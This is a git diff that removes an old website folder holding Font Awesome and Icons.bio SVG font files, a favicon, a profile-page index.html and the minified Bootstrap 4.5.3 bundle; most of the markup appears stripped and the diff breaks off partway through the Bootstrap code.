b/old/images/fa-light-300.svg deleted file mode 100644 index 666198f..0000000 --- a/old/images/fa-light-300.svg +++ /dev/null @@ -1,12423 +0,0 @@ - - - - -Created by FontForge 20201107 at Wed Aug 4 12:24:17 2021 - By Robert Madole -Copyright (c) Font Awesome - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/old/images/fa-regular-400.svg b/old/images/fa-regular-400.svg deleted file mode 100644 index 71b2f7c..0000000 --- a/old/images/fa-regular-400.svg +++ /dev/null @@ -1,11323 +0,0 @@ - - - - -Created by FontForge 20201107 at Wed Aug 4 12:24:14 2021 - By Robert Madole -Copyright (c) Font Awesome - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/old/images/fa-solid-900.svg b/old/images/fa-solid-900.svg deleted file mode 100644 index b068060..0000000 --- a/old/images/fa-solid-900.svg +++ /dev/null @@ -1,9653 +0,0 @@ - - - - -Created by FontForge 20201107 at Wed Aug 4 12:24:16 2021 - By Robert Madole -Copyright (c) Font Awesome - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/old/images/favicon.png b/old/images/favicon.png deleted file mode 100644 index 04ce320..0000000 Binary files a/old/images/favicon.png and /dev/null differ diff --git a/old/images/iconsbio1_3384ab2a3f8bd680b21eff9a2943bea8.svg b/old/images/iconsbio1_3384ab2a3f8bd680b21eff9a2943bea8.svg deleted file mode 100644 index 3a783f3..0000000 --- a/old/images/iconsbio1_3384ab2a3f8bd680b21eff9a2943bea8.svg +++ /dev/null @@ -1,22689 +0,0 @@ - - - - - -Created by FontForge 20230101 at Wed Apr 10 09:25:01 2024 - By Andrea Olivato -Icons.bio - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/old/images/iconsbio2_c50814b9b24c1e58d9e3e9a245a8c9e5.svg b/old/images/iconsbio2_c50814b9b24c1e58d9e3e9a245a8c9e5.svg deleted file mode 100644 index ad15dab..0000000 --- a/old/images/iconsbio2_c50814b9b24c1e58d9e3e9a245a8c9e5.svg +++ /dev/null @@ -1,7327 +0,0 @@ - - - - - -Created by FontForge 20230101 at Sat Jun 22 09:31:37 2024 - By Andrea Olivato -Icons.bio - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/old/index.html b/old/index.html deleted file mode 100644 index ee64f1a..0000000 --- a/old/index.html +++ /dev/null @@ -1,2007 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - @_helpdev - - - - - - - - - - - - - - - -
-
-
-
-
-
- - @_helpdev Profile Picture - - HelpDev -
-
-
-
- -
-
-
-
-
-
- -
- - - - - \ No newline at end of file diff --git a/old/js/bootstrap.bundle.min.js b/old/js/bootstrap.bundle.min.js deleted file mode 100644 index ef603da..0000000 --- a/old/js/bootstrap.bundle.min.js +++ /dev/null @@ -1,7 +0,0 @@ -/*! - * Bootstrap v4.5.3 (https://getbootstrap.com/) - * Copyright 2011-2020 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) - * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) - */ -!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery")):"function"==typeof define&&define.amd?define(["exports","jquery"],e):e((t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap={},t.jQuery)}(this,(function(t,e){"use strict";function n(t){return t&&"object"==typeof t&&"default"in t?t:{default:t}}var i=n(e);function o(t,e){for(var n=0;n=4)throw new Error("Bootstrap's JavaScript requires at least jQuery v1.9.1 but less than v4.0.0")}};l.jQueryDetection(),i.default.fn.emulateTransitionEnd=s,i.default.event.special[l.TRANSITION_END]={bindType:"transitionend",delegateType:"transitionend",handle:function(t){if(i.default(t.target).is(this))return t.handleObj.handler.apply(this,arguments)}};var u="alert",f=i.default.fn[u],d=function(){function t(t){this._element=t}var e=t.prototype;return e.close=function(t){var e=this._element;t&&(e=this._getRootElement(t)),this._triggerCloseEvent(e).isDefaultPrevented()||this._removeElement(e)},e.dispose=function(){i.default.removeData(this._element,"bs.alert"),this._element=null},e._getRootElement=function(t){var e=l.getSelectorFromElement(t),n=!1;return e&&(n=document.querySelector(e)),n||(n=i.default(t).closest(".alert")[0]),n},e._triggerCloseEvent=function(t){var e=i.default.Event("close.bs.alert");return i.default(t).trigger(e),e},e._removeElement=function(t){var e=this;if(i.default(t).removeClass("show"),i.default(t).hasClass("fade")){var n=l.getTransitionDurationFromElement(t);i.default(t).one(l.TRANSITION_END,(function(n){return e._destroyElement(t,n)})).emulateTransitionEnd(n)}else this._destroyElement(t)},e._destroyElement=function(t){i.default(t).detach().trigger("closed.bs.alert").remove()},t._jQueryInterface=function(e){return this.each((function(){var n=i.default(this),o=n.data("bs.alert");o||(o=new t(this),n.data("bs.alert",o)),"close"===e&&o[e](this)}))},t._handleDismiss=function(t){return function(e){e&&e.preventDefault(),t.close(this)}},r(t,null,[{key:"VERSION",get:function(){return"4.5.3"}}]),t}();i.default(document).on("click.bs.alert.data-api",'[data-dismiss="alert"]',d._handleDismiss(new d)),i.default.fn[u]=d._jQueryInterface,i.default.fn[u].Constructor=d,i.default.fn[u].noConflict=function(){return i.default.fn[u]=f,d._jQueryInterface};var c=i.default.fn.button,h=function(){function t(t){this._element=t,this.shouldAvoidTriggerChange=!1}var e=t.prototype;return e.toggle=function(){var t=!0,e=!0,n=i.default(this._element).closest('[data-toggle="buttons"]')[0];if(n){var o=this._element.querySelector('input:not([type="hidden"])');if(o){if("radio"===o.type)if(o.checked&&this._element.classList.contains("active"))t=!1;else{var r=n.querySelector(".active");r&&i.default(r).removeClass("active")}t&&("checkbox"!==o.type&&"radio"!==o.type||(o.checked=!this._element.classList.contains("active")),this.shouldAvoidTriggerChange||i.default(o).trigger("change")),o.focus(),e=!1}}this._element.hasAttribute("disabled")||this._element.classList.contains("disabled")||(e&&this._element.setAttribute("aria-pressed",!this._element.classList.contains("active")),t&&i.default(this._element).toggleClass("active"))},e.dispose=function(){i.default.removeData(this._element,"bs.button"),this._element=null},t._jQueryInterface=function(e,n){return this.each((function(){var o=i.default(this),r=o.data("bs.button");r||(r=new t(this),o.data("bs.button",r)),r.shouldAvoidTriggerChange=n,"toggle"===e&&r[e]()}))},r(t,null,[{key:"VERSION",get:function(){return"4.5.3"}}]),t}();i.default(document).on("click.bs.button.data-api",'[data-toggle^="button"]',(function(t){var e=t.target,n=e;if(i.default(e).hasClass("btn")||(e=i.default(e).closest(".btn")[0]),!e||e.hasAttribute("disabled")||e.classList.contains("disabled"))t.preventDefault();else{var o=e.querySelector('input:not([type="hidden"])');if(o&&(o.hasAttribute("disabled")||o.classList.contains("disabled")))return void t.preventDefault();"INPUT"!==n.tagName&&"LABEL"===e.tagName||h._jQueryInterface.call(i.default(e),"toggle","INPUT"===n.tagName)}})).on("focus.bs.button.data-api blur.bs.button.data-api",'[data-toggle^="button"]',(function(t){var e=i.default(t.target).closest(".btn")[0];i.default(e).toggleClass("focus",/^focus(in)?$/.test(t.type))})),i.default(window).on("load.bs.button.data-api",(function(){for(var t=[].slice.call(document.querySelectorAll('[data-toggle="buttons"] .btn')),e=0,n=t.length;e0,this._pointerEvent=Boolean(window.PointerEvent||window.MSPointerEvent),this._addEventListeners()}var e=t.prototype;return e.next=function(){this._isSliding||this._slide("next")},e.nextWhenVisible=function(){var t=i.default(this._element);!document.hidden&&t.is(":visible")&&"hidden"!==t.css("visibility")&&this.next()},e.prev=function(){this._isSliding||this._slide("prev")},e.pause=function(t){t||(this._isPaused=!0),this._element.querySelector(".carousel-item-next, .carousel-item-prev")&&(l.triggerTransitionEnd(this._element),this.cycle(!0)),clearInterval(this._interval),this._interval=null},e.cycle=function(t){t||(this._isPaused=!1),this._interval&&(clearInterval(this._interval),this._interval=null),this._config.interval&&!this._isPaused&&(this._interval=setInterval((document.visibilityState?this.nextWhenVisible:this.next).bind(this),this._config.interval))},e.to=function(t){var e=this;this._activeElement=this._element.querySelector(".active.carousel-item");var n=this._getItemIndex(this._activeElement);if(!(t>this._items.length-1||t<0))if(this._isSliding)i.default(this._element).one("slid.bs.carousel",(function(){return e.to(t)}));else{if(n===t)return this.pause(),void this.cycle();var o=t>n?"next":"prev";this._slide(o,this._items[t])}},e.dispose=function(){i.default(this._element).off(m),i.default.removeData(this._element,"bs.carousel"),this._items=null,this._config=null,this._element=null,this._interval=null,this._isPaused=null,this._isSliding=null,this._activeElement=null,this._indicatorsElement=null},e._getConfig=function(t){return t=a({},v,t),l.typeCheckConfig(p,t,_),t},e._handleSwipe=function(){var t=Math.abs(this.touchDeltaX);if(!(t<=40)){var e=t/this.touchDeltaX;this.touchDeltaX=0,e>0&&this.prev(),e<0&&this.next()}},e._addEventListeners=function(){var t=this;this._config.keyboard&&i.default(this._element).on("keydown.bs.carousel",(function(e){return t._keydown(e)})),"hover"===this._config.pause&&i.default(this._element).on("mouseenter.bs.carousel",(function(e){return t.pause(e)})).on("mouseleave.bs.carousel",(function(e){return t.cycle(e)})),this._config.touch&&this._addTouchEventListeners()},e._addTouchEventListeners=function(){var t=this;if(this._touchSupported){var e=function(e){t._pointerEvent&&b[e.originalEvent.pointerType.toUpperCase()]?t.touchStartX=e.originalEvent.clientX:t._pointerEvent||(t.touchStartX=e.originalEvent.touches[0].clientX)},n=function(e){t._pointerEvent&&b[e.originalEvent.pointerType.toUpperCase()]&&(t.touchDeltaX=e.originalEvent.clientX-t.touchStartX),t._handleSwipe(),"hover"===t._config.pause&&(t.pause(),t.touchTimeout&&clearTimeout(t.touchTimeout),t.touchTimeout=setTimeout((function(e){return t.cycle(e)}),500+t._config.interval))};i.default(this._element.querySelectorAll(".carousel-item img")).on("dragstart.bs.carousel",(function(t){return t.preventDefault()})),this._pointerEvent?(i.default(this._element).on("pointerdown.bs.carousel",(function(t){return e(t)})),i.default(this._element).on("pointerup.bs.carousel",(function(t){return n(t)})),this._element.classList.add("pointer-event")):(i.default(this._element).on("touchstart.bs.carousel",(function(t){return e(t)})),i.default(this._element).on("touchmove.bs.carousel",(function(e){return function(e){e.originalEvent.touches&&e.originalEvent.touches.length>1?t.touchDeltaX=0:t.touchDeltaX=e.originalEvent.touches[0].clientX-t.touchStartX}(e)})),i.default(this._element).on("touchend.bs.carousel",(function(t){return n(t)})))}},e._keydown=function(t){if(!/input|textarea/i.test(t.target.tagName))switch(t.which){case 37:t.preventDefault(),this.prev();break;case 39:t.preventDefault(),this.next()}},e._getItemIndex=function(t){return this._items=t&&t.parentNode?[].slice.call(t.parentNode.querySelectorAll(".carousel-item")):[],this._items.indexOf(t)},e._getItemByDirection=function(t,e){var n="next"===t,i="prev"===t,o=this._getItemIndex(e),r=this._items.length-1;if((i&&0===o||n&&o===r)&&!this._config.wrap)return e;var a=(o+("prev"===t?-1:1))%this._items.length;return-1===a?this._items[this._items.length-1]:this._items[a]},e._triggerSlideEvent=function(t,e){var n=this._getItemIndex(t),o=this._getItemIndex(this._element.querySelector(".active.carousel-item")),r=i.default.Event("slide.bs.carousel",{relatedTarget:t,direction:e,from:o,to:n});return i.default(this._element).trigger(r),r},e._setActiveIndicatorElement=function(t){if(this._indicatorsElement){var e=[].slice.call(this._indicatorsElement.querySelectorAll(".active"));i.default(e).removeClass("active");var n=this._indicatorsElement.children[this._getItemIndex(t)];n&&i.default(n).addClass("active")}},e._slide=function(t,e){var n,o,r,a=this,s=this._element.querySelector(".active.carousel-item"),u=this._getItemIndex(s),f=e||s&&this._getItemByDirection(t,s),d=this._getItemIndex(f),c=Boolean(this._interval);if("next"===t?(n="carousel-item-left",o="carousel-item-next",r="left"):(n="carousel-item-right",o="carousel-item-prev",r="right"),f&&i.default(f).hasClass("active"))this._isSliding=!1;else if(!this._triggerSlideEvent(f,r).isDefaultPrevented()&&s&&f){this._isSliding=!0,c&&this.pause(),this._setActiveIndicatorElement(f);var h=i.default.Event("slid.bs.carousel",{relatedTarget:f,direction:r,from:u,to:d});if(i.default(this._element).hasClass("slide")){i.default(f).addClass(o),l.reflow(f),i.default(s).addClass(n),i.default(f).addClass(n);var p=parseInt(f.getAttribute("data-interval"),10);p?(this._config.defaultInterval=this._config.defaultInterval||this._config.interval,this._config.interval=p):this._config.interval=this._config.defaultInterval||this._config.interval;var m=l.getTransitionDurationFromElement(s);i.default(s).one(l.TRANSITION_END,(function(){i.default(f).removeClass(n+" "+o).addClass("active"),i.default(s).removeClass("active "+o+" "+n),a._isSliding=!1,setTimeout((function(){return i.default(a._element).trigger(h)}),0)})).emulateTransitionEnd(m)}else i.default(s).removeClass("active"),i.default(f).addClass("active"),this._isSliding=!1,i.default(this._element).trigger(h);c&&this.cycle()}},t._jQueryInterface=function(e){return this.each((function(){var n=i.default(this).data("bs.carousel"),o=a({},v,i.default(this).data());"object"==typeof e&&(o=a({},o,e));var r="string"==typeof e?e:o.slide;if(n||(n=new t(this,o),i.default(this).data("bs.carousel",n)),"number"==typeof e)n.to(e);else if("string"==typeof r){if("undefined"==typeof n[r])throw new TypeError('No method named "'+r+'"');n[r]()}else o.interval&&o.ride&&(n.pause(),n.cycle())}))},t._dataApiClickHandler=function(e){var n=l.getSelectorFromElement(this);if(n){var o=i.default(n)[0];if(o&&i.default(o).hasClass("carousel")){var r=a({},i.default(o).data(),i.default(this).data()),s=this.getAttribute("data-slide-to");s&&(r.interval=!1),t._jQueryInterface.call(i.default(o),r),s&&i.default(o).data("bs.carousel").to(s),e.preventDefault()}}},r(t,null,[{key:"VERSION",get:function(){return"4.5.3"}},{key:"Default",get:function(){return v}}]),t}();i.default(document).on("click.bs.carousel.data-api","[data-slide], [data-slide-to]",y._dataApiClickHandler),i.default(window).on("load.bs.carousel.data-api",(function(){for(var 